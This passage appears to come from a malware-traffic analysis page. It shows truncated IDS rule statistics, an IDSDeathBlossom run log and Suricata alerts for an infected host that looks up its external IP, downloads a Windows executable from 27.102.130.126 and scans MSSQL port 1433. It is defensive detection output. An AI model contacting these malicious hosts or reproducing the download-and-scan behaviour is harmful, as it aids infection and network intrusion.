  120      2014471      1        6        44349        0.01   1        0        44349       44349.00    0.00        44349.00   
  121      2811390      1        2        166177       0.02   5        0        44062       33235.40    0.00        33235.40   
  122      2022053      1        2        867794       0.11   61       0        44007       14226.13    0.00        14226.13   
  123      2819649      1        3        881210       0.11   61       0        43940       14446.07    0.00        14446.07   
  124      2021068      1        2        43616        0.01   1        1        43616       43616.00    43616.00    0.00       
  125      2023711      1        2        87

This file has been truncated. Go here to download in full.


IDSDeathBlossom.py.log - (1147 bytes) - download
1
2
3
4
5
6
7
8
2019-04-03 13:39:57,968 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-04-03 13:39:58,705 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-04-03 13:39:58,705 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-04-03 13:39:58,705 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-04-03 13:39:58,705 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-04-03 13:39:58,706 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/cfcab331f081527fd30a5330ac5c8df556b33745cb75ec8c950e11a498e082d2 -r /var/pcap/04032019.1339-network.pcap -vvv -k none
2019-04-03 13:40:21,274 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-04-03 13:40:21,275 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 23.3142771721


suricata-4.0.0-etpro-all-alert-2019-04-03-T-13-40-21-04032019.1339-network.pcap.txt - (3563 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
03/29/2019-09:49:34.388290  [**] [1:2811058:2] ETPRO POLICY External IP Lookup - ip.42.pl [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.240.16:49428 -> 79.98.145.42:80
03/29/2019-09:49:34.388290  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49428 -> 79.98.145.42:80
03/29/2019-09:49:36.272085  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49429 -> 45.79.77.20:80
03/29/2019-09:49:36.699781  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49430 -> 153.92.4.49:80
03/29/2019-09:49:37.163101  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.163101  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.163101  [**] [1:2019714:10] ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.290041  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:49:37.290041  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:49:34.165698  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49687 -> 192.168.0.1:1433
03/29/2019-09:49:37.644459  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49688 -> 192.168.0.2:1433
03/29/2019-09:49:37.644675  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49689 -> 192.168.0.6:1433
03/29/2019-09:49:34.165907  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49690 -> 192.168.0.5:1433
03/29/2019-09:49:34.165925  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49691 -> 192.168.0.3:1433
03/29/2019-09:49:37.689490  [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.240.16:49719 -> 192.168.0.52:1433
03/29/2019-09:49:38.528631  [**] [1:2015744:4] ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) [**] [Classification: Misc activity] [Priority: 3] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:50:33.979260  [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.240.16:52365 -> 8.8.8.62:1433